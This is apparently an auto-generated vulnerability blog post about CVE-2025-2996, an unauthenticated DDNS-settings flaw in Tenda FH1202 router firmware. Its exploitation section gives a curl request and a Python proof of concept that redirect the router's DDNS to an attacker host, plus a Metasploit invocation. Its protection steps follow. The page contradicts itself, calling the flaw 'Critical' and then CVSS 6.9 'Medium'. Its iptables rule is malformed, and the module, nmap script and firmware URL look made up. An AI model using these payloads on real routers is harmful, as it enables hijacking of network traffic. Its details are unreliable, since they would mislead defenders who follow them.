Tenda FH1202, Improper Access Control, CVE-2025-2996 (Critical)

How CVE-2025-2996 Works

The vulnerability in Tenda FH1202 firmware version 1.2.0.14(408) resides in the `/goform/SysToolDDNS` endpoint of the web management interface. Attackers can exploit improper access controls to execute unauthorized actions remotely without authentication. The flaw allows manipulation of Dynamic DNS (DDNS) settings, potentially leading to router takeover, MITM attacks, or network redirection. The exploit leverages crafted HTTP requests to bypass authentication checks, granting administrative access.

DailyCVE Form

Platform: Tenda FH1202
Version: 1.2.0.14(408)
Vulnerability: Improper Access Control
Severity: Critical
Date: 04/08/2025

What Undercode Say:

Exploitation

1. Craft Malicious Request:

curl -X POST http://<Tenda_IP>/goform/SysToolDDNS -d "ddns_enable=1&server=attacker.com"

2. Exploit via Metasploit:

use exploit/linux/http/tenda_ddns_auth_bypass
set RHOSTS <target_IP>
exploit

3. Python PoC:

import requests
payload = {"ddns_enable": "1", "server": "malicious-server.net"}
requests.post("http://<target>/goform/SysToolDDNS", data=payload)

Protection

1. Patch Firmware:

wget https://www.tenda.com.cn/firmware/FH1202_1.2.0.15.zip

2. Block Unauthorized Access:

iptables -A INPUT -p tcp --dport 80 -s ! <trusted_IP> -j DROP

3. Disable Web Management:

nvram set http_enable=0
nvram commit

Detection

1. Log Analysis:

grep "/goform/SysToolDDNS" /var/log/httpd.log

2. Nmap Check:

nmap -p 80 --script http-vuln-cve2025-2996 <target>

Mitigation

  • Disable remote management.
  • Update to firmware v1.2.0.15+.
  • Monitor unexpected DDNS changes.

Analytics

  • CVSS: 6.9 (Medium)
  • Attack Vector: Network
  • Impact: Confidentiality (Low), Integrity (Low)
  • Exploitability: High (No auth required)

References

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2996
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top